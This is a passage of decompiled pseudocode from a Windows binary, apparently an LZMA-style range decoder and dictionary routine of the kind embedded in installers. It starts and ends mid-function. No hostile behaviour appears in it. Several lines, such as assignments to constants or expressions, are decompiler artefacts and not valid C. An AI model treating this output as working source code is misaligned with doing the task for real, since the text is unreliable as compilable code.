              					} else {
              						if( *(__ebp - 0x60) == 0) {
              							L171:
              							_t536 = _t535 | 0xffffffff;
              							L172:
              							return _t536;
              						}
              						__eax = 0;
              						_t258 =  *(__ebp - 0x38) - 7 >= 0;
              						0 | _t258 = _t258 + _t258 + 9;
              						 *(__ebp - 0x38) = _t258 + _t258 + 9;
              						L75:
              						if( *(__ebp - 0x64) == 0) {
              							 *(__ebp - 0x88) = 0x1b;
              							L170:
              							_t568 = 0x22;
              							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
              							_t536 = 0;
              							goto L172;
              						}
              						__eax =  *(__ebp - 0x14);
              						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              						if(__eax >=  *(__ebp - 0x74)) {
              							__eax = __eax +  *(__ebp - 0x74);
              						}
              						__edx =  *(__ebp - 8);
              						__cl =  *(__eax + __edx);
              						__eax =  *(__ebp - 0x14);
              						 *(__ebp - 0x5c) = __cl;
              						 *(__eax + __edx) = __cl;
              						__eax = __eax + 1;
              						__edx = 0;
              						_t274 = __eax %  *(__ebp - 0x74);
              						__eax = __eax /  *(__ebp - 0x74);
              						__edx = _t274;
              						__eax =  *(__ebp - 0x68);
              						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              						_t283 = __ebp - 0x64;
              						 *_t283 =  *(__ebp - 0x64) - 1;
              						 *( *(__ebp - 0x68)) = __cl;
              						L79:
              						 *(__ebp - 0x14) = __edx;
              						L80:
              						 *(__ebp - 0x88) = 2;
              					}
              					L1:
              					_t535 =  *(_t613 - 0x88);
              					if(_t535 > 0x1c) {
              						goto L171;
              					}
              					switch( *((intOrPtr*)(_t535 * 4 +  &M004074FE))) {
              						case 0:
              							if( *(_t613 - 0x6c) == 0) {
              								goto L170;
              							}
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							_t535 =  *( *(_t613 - 0x70));
              							if(_t535 > 0xe1) {
              								goto L171;
              							}
              							_t539 = _t535 & 0x000000ff;
              							_push(0x2d);
              							asm("cdq");
              							_pop(_t570);
              							_push(9);
              							_pop(_t571);
              							_t609 = _t539 / _t570;
              							_t541 = _t539 % _t570 & 0x000000ff;
              							asm("cdq");
              							_t604 = _t541 % _t571 & 0x000000ff;
              							 *(_t613 - 0x3c) = _t604;
              							 *(_t613 - 0x1c) = (1 << _t609) - 1;
              							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
              							_t612 = (0x300 << _t604 + _t609) + 0x736;
              							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
              								L10:
              								if(_t612 == 0) {
              									L12:
              									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              									goto L15;
              								} else {
              									goto L11;
              								}
              								do {
              									L11:
              									_t612 = _t612 - 1;
              									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
              								} while (_t612 != 0);
              								goto L12;
              							}
              							if( *(_t613 - 4) != 0) {
              								GlobalFree( *(_t613 - 4));
              							}
              							_t535 = GlobalAlloc(0x40, 0x600); // executed
              							 *(_t613 - 4) = _t535;
              							if(_t535 == 0) {
              								goto L171;
              							} else {
              								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
              								goto L10;
              							}
              						case 1:
              							L13:
              							__eflags =  *(_t613 - 0x6c);
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 1;
              								goto L170;
              							}
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							_t45 = _t613 - 0x48;
              							 *_t45 =  *(_t613 - 0x48) + 1;
              							__eflags =  *_t45;
              							L15:
              							if( *(_t613 - 0x48) < 4) {
              								goto L13;
              							}
              							_t547 =  *(_t613 - 0x40);
              							if(_t547 ==  *(_t613 - 0x74)) {
              								L20:
              								 *(_t613 - 0x48) = 5;
              								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
              								goto L23;
              							}
              							 *(_t613 - 0x74) = _t547;
              							if( *(_t613 - 8) != 0) {
              								GlobalFree( *(_t613 - 8));
              							}
              							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
              							 *(_t613 - 8) = _t535;
              							if(_t535 == 0) {
              								goto L171;
              							} else {
              								goto L20;
              							}
              						case 2:
              							L24:
              							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
              							 *(_t613 - 0x84) = 6;
              							 *(_t613 - 0x4c) = _t554;
              							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
              							goto L132;
              						case 3:
              							L21:
              							__eflags =  *(_t613 - 0x6c);
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 3;
              								goto L170;
              							}
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							_t67 = _t613 - 0x70;
              							 *_t67 =  &(( *(_t613 - 0x70))[1]);
              							__eflags =  *_t67;
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              							L23:
              							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
              							if( *(_t613 - 0x48) != 0) {
              								goto L21;
              							}
              							goto L24;
              						case 4:
              							goto L133;
              						case 5:
              							goto L137;
              						case 6:
              							__edx = 0;
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x34) = 1;
              								 *(__ebp - 0x84) = 7;
              								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x5c) & 0x000000ff;
              							__esi =  *(__ebp - 0x60);
              							__cl = 8;
              							__cl = 8 -  *(__ebp - 0x3c);
              							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              							__ecx =  *(__ebp - 0x3c);
              							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              							__ecx =  *(__ebp - 4);
              							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              							__eflags =  *(__ebp - 0x38) - 4;
              							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              							if( *(__ebp - 0x38) >= 4) {
              								__eflags =  *(__ebp - 0x38) - 0xa;
              								if( *(__ebp - 0x38) >= 0xa) {
              									_t98 = __ebp - 0x38;
              									 *_t98 =  *(__ebp - 0x38) - 6;
              									__eflags =  *_t98;
              								} else {
              									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              								}
              							} else {
              								 *(__ebp - 0x38) = 0;
              							}
              							__eflags =  *(__ebp - 0x34) - __edx;
              							if( *(__ebp - 0x34) == __edx) {
              								__ebx = 0;
              								__ebx = 1;
              								goto L61;
              							} else {
              								__eax =  *(__ebp - 0x14);
              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              								__eflags = __eax -  *(__ebp - 0x74);
              								if(__eax >=  *(__ebp - 0x74)) {
              									__eax = __eax +  *(__ebp - 0x74);
              									__eflags = __eax;
              								}
              								__ecx =  *(__ebp - 8);
              								__ebx = 0;
              								__ebx = 1;
              								__al =  *((intOrPtr*)(__eax + __ecx));
              								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              								goto L41;
              							}
              						case 7:
              							__eflags =  *(__ebp - 0x40) - 1;
              							if( *(__ebp - 0x40) != 1) {
              								__eax =  *(__ebp - 0x24);
              								 *(__ebp - 0x80) = 0x16;
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x28);
              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
              								__eax =  *(__ebp - 0x2c);
              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              								__eax = 0;
              								__eflags =  *(__ebp - 0x38) - 7;
              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              								__al = __al & 0x000000fd;
              								__eax = (__eflags >= 0) - 1 + 0xa;
              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              								__eax =  *(__ebp - 4);
              								__eax =  *(__ebp - 4) + 0x664;
              								__eflags = __eax;
              								 *(__ebp - 0x58) = __eax;
              								goto L69;
              							}
              							__eax =  *(__ebp - 4);
              							__ecx =  *(__ebp - 0x38);
              							 *(__ebp - 0x84) = 8;
              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              							goto L132;
              						case 8:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xa;
              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              							} else {
              								__eax =  *(__ebp - 0x38);
              								__ecx =  *(__ebp - 4);
              								__eax =  *(__ebp - 0x38) + 0xf;
              								 *(__ebp - 0x84) = 9;
              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              							}
              							goto L132;
              						case 9:
              							goto L0;
              						case 0xa:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xb;
              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x28);
              							goto L88;
              						case 0xb:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__ecx =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x20);
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              							} else {
              								__eax =  *(__ebp - 0x24);
              							}
              							__ecx =  *(__ebp - 0x28);
              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
              							L88:
              							__ecx =  *(__ebp - 0x2c);
              							 *(__ebp - 0x2c) = __eax;
              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              							goto L89;
              						case 0xc:
              							L99:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xc;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t334 = __ebp - 0x70;
              							 *_t334 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t334;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							__eax =  *(__ebp - 0x2c);
              							goto L101;
              						case 0xd:
              							L37:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xd;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t122 = __ebp - 0x70;
              							 *_t122 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t122;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L39:
              							__eax =  *(__ebp - 0x40);
              							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              								goto L48;
              							}
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								goto L54;
              							}
              							L41:
              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              							__ecx =  *(__ebp - 0x58);
              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              							 *(__ebp - 0x48) = __eax;
              							__eax = __eax + 1;
              							__eax = __eax << 8;
              							__eax = __eax + __ebx;
              							__esi =  *(__ebp - 0x58) + __eax * 2;
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edx = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								 *(__ebp - 0x40) = 1;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								__ebx = __ebx + __ebx + 1;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edx;
              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L39;
              							} else {
              								goto L37;
              							}
              						case 0xe:
              							L46:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xe;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t156 = __ebp - 0x70;
              							 *_t156 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t156;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							while(1) {
              								L48:
              								__eflags = __ebx - 0x100;
              								if(__ebx >= 0x100) {
              									break;
              								}
              								__eax =  *(__ebp - 0x58);
              								__edx = __ebx + __ebx;
              								__ecx =  *(__ebp - 0x10);
              								__esi = __edx + __eax;
              								__ecx =  *(__ebp - 0x10) >> 0xb;
              								__ax =  *__esi;
              								 *(__ebp - 0x54) = __esi;
              								__edi = __ax & 0x0000ffff;
              								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              								__eflags =  *(__ebp - 0xc) - __ecx;
              								if( *(__ebp - 0xc) >= __ecx) {
              									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              									__cx = __ax;
              									_t170 = __edx + 1; // 0x1
              									__ebx = _t170;
              									__cx = __ax >> 5;
              									__eflags = __eax;
              									 *__esi = __ax;
              								} else {
              									 *(__ebp - 0x10) = __ecx;
              									0x800 = 0x800 - __edi;
              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              									__ebx = __ebx + __ebx;
              									 *__esi = __cx;
              								}
              								__eflags =  *(__ebp - 0x10) - 0x1000000;
              								 *(__ebp - 0x44) = __ebx;
              								if( *(__ebp - 0x10) >= 0x1000000) {
              									continue;
              								} else {
              									goto L46;
              								}
              							}
              							L54:
              							_t173 = __ebp - 0x34;
              							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              							__eflags =  *_t173;
              							goto L55;
              						case 0xf:
              							L58:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xf;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t203 = __ebp - 0x70;
              							 *_t203 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t203;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L60:
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								L55:
              								__al =  *(__ebp - 0x44);
              								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              								goto L56;
              							}
              							L61:
              							__eax =  *(__ebp - 0x58);
              							__edx = __ebx + __ebx;
              							__ecx =  *(__ebp - 0x10);
              							__esi = __edx + __eax;
              							__ecx =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								_t217 = __edx + 1; // 0x1
              								__ebx = _t217;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L60;
              							} else {
              								goto L58;
              							}
              						case 0x10:
              							L109:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x10;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t365 = __ebp - 0x70;
              							 *_t365 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t365;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							goto L111;
              						case 0x11:
              							goto L69;
              						case 0x12:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 0x58);
              								 *(__ebp - 0x84) = 0x13;
              								__esi =  *(__ebp - 0x58) + 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x4c);
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							__eflags = __eax;
              							__eax =  *(__ebp - 0x58) + __eax + 4;
              							goto L130;
              						case 0x13:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								_t469 = __ebp - 0x58;
              								 *_t469 =  *(__ebp - 0x58) + 0x204;
              								__eflags =  *_t469;
              								 *(__ebp - 0x30) = 0x10;
              								 *(__ebp - 0x40) = 8;
              								L144:
              								 *(__ebp - 0x7c) = 0x14;
              								goto L145;
              							}
              							__eax =  *(__ebp - 0x4c);
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							 *(__ebp - 0x30) = 8;
              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              							L130:
              							 *(__ebp - 0x58) = __eax;
              							 *(__ebp - 0x40) = 3;
              							goto L144;
              						case 0x14:
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              							__eax =  *(__ebp - 0x80);
              							goto L140;
              						case 0x15:
              							__eax = 0;
              							__eflags =  *(__ebp - 0x38) - 7;
              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              							__al = __al & 0x000000fd;
              							__eax = (__eflags >= 0) - 1 + 0xb;
              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              							goto L120;
              						case 0x16:
              							__eax =  *(__ebp - 0x30);
              							__eflags = __eax - 4;
              							if(__eax >= 4) {
              								_push(3);
              								_pop(__eax);
              							}
              							__ecx =  *(__ebp - 4);
              							 *(__ebp - 0x40) = 6;
              							__eax = __eax << 7;
              							 *(__ebp - 0x7c) = 0x19;
              							 *(__ebp - 0x58) = __eax;
              							goto L145;
              						case 0x17:
              							L145:
              							__eax =  *(__ebp - 0x40);
              							 *(__ebp - 0x50) = 1;
              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
              							goto L149;
              						case 0x18:
              							L146:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x18;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t484 = __ebp - 0x70;
              							 *_t484 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t484;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L148:
              							_t487 = __ebp - 0x48;
              							 *_t487 =  *(__ebp - 0x48) - 1;
              							__eflags =  *_t487;
              							L149:
              							__eflags =  *(__ebp - 0x48);
              							if( *(__ebp - 0x48) <= 0) {
              								__ecx =  *(__ebp - 0x40);
              								__ebx =  *(__ebp - 0x50);
              								0 = 1;
              								__eax = 1 << __cl;
              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
              								__eax =  *(__ebp - 0x7c);
              								 *(__ebp - 0x44) = __ebx;
              								goto L140;
              							}
              							__eax =  *(__ebp - 0x50);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              							__eax =  *(__ebp - 0x58);
              							__esi = __edx + __eax;
              							 *(__ebp - 0x54) = __esi;
              							__ax =  *__esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								__cx = __ax >> 5;
              								__eax = __eax - __ecx;
              								__edx = __edx + 1;
              								__eflags = __edx;
              								 *__esi = __ax;
              								 *(__ebp - 0x50) = __edx;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L148;
              							} else {
              								goto L146;
              							}
              						case 0x19:
              							__eflags = __ebx - 4;
              							if(__ebx < 4) {
              								 *(__ebp - 0x2c) = __ebx;
              								L119:
              								_t393 = __ebp - 0x2c;
              								 *_t393 =  *(__ebp - 0x2c) + 1;
              								__eflags =  *_t393;
              								L120:
              								__eax =  *(__ebp - 0x2c);
              								__eflags = __eax;
              								if(__eax == 0) {
              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              									goto L170;
              								}
              								__eflags = __eax -  *(__ebp - 0x60);
              								if(__eax >  *(__ebp - 0x60)) {
              									goto L171;
              								}
              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              								__eax =  *(__ebp - 0x30);
              								_t400 = __ebp - 0x60;
              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              								__eflags =  *_t400;
              								goto L123;
              							}
              							__ecx = __ebx;
              							__eax = __ebx;
              							__ecx = __ebx >> 1;
              							__eax = __ebx & 0x00000001;
              							__ecx = (__ebx >> 1) - 1;
              							__al = __al | 0x00000002;
              							__eax = (__ebx & 0x00000001) << __cl;
              							__eflags = __ebx - 0xe;
              							 *(__ebp - 0x2c) = __eax;
              							if(__ebx >= 0xe) {
              								__ebx = 0;
              								 *(__ebp - 0x48) = __ecx;
              								L102:
              								__eflags =  *(__ebp - 0x48);
              								if( *(__ebp - 0x48) <= 0) {
              									__eax = __eax + __ebx;
              									 *(__ebp - 0x40) = 4;
              									 *(__ebp - 0x2c) = __eax;
              									__eax =  *(__ebp - 4);
              									__eax =  *(__ebp - 4) + 0x644;
              									__eflags = __eax;
              									L108:
              									__ebx = 0;
              									 *(__ebp - 0x58) = __eax;
              									 *(__ebp - 0x50) = 1;
              									 *(__ebp - 0x44) = 0;
              									 *(__ebp - 0x48) = 0;
              									L112:
              									__eax =  *(__ebp - 0x40);
              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              										_t391 = __ebp - 0x2c;
              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
              										__eflags =  *_t391;
              										goto L119;
              									}
              									__eax =  *(__ebp - 0x50);
              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              									__eax =  *(__ebp - 0x58);
              									__esi = __edi + __eax;
              									 *(__ebp - 0x54) = __esi;
              									__ax =  *__esi;
              									__ecx = __ax & 0x0000ffff;
              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              									__eflags =  *(__ebp - 0xc) - __edx;
              									if( *(__ebp - 0xc) >= __edx) {
              										__ecx = 0;
              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              										__ecx = 1;
              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              										__ebx = 1;
              										__ecx =  *(__ebp - 0x48);
              										__ebx = 1 << __cl;
              										__ecx = 1 << __cl;
              										__ebx =  *(__ebp - 0x44);
              										__ebx =  *(__ebp - 0x44) | __ecx;
              										__cx = __ax;
              										__cx = __ax >> 5;
              										__eax = __eax - __ecx;
              										__edi = __edi + 1;
              										__eflags = __edi;
              										 *(__ebp - 0x44) = __ebx;
              										 *__esi = __ax;
              										 *(__ebp - 0x50) = __edi;
              									} else {
              										 *(__ebp - 0x10) = __edx;
              										0x800 = 0x800 - __ecx;
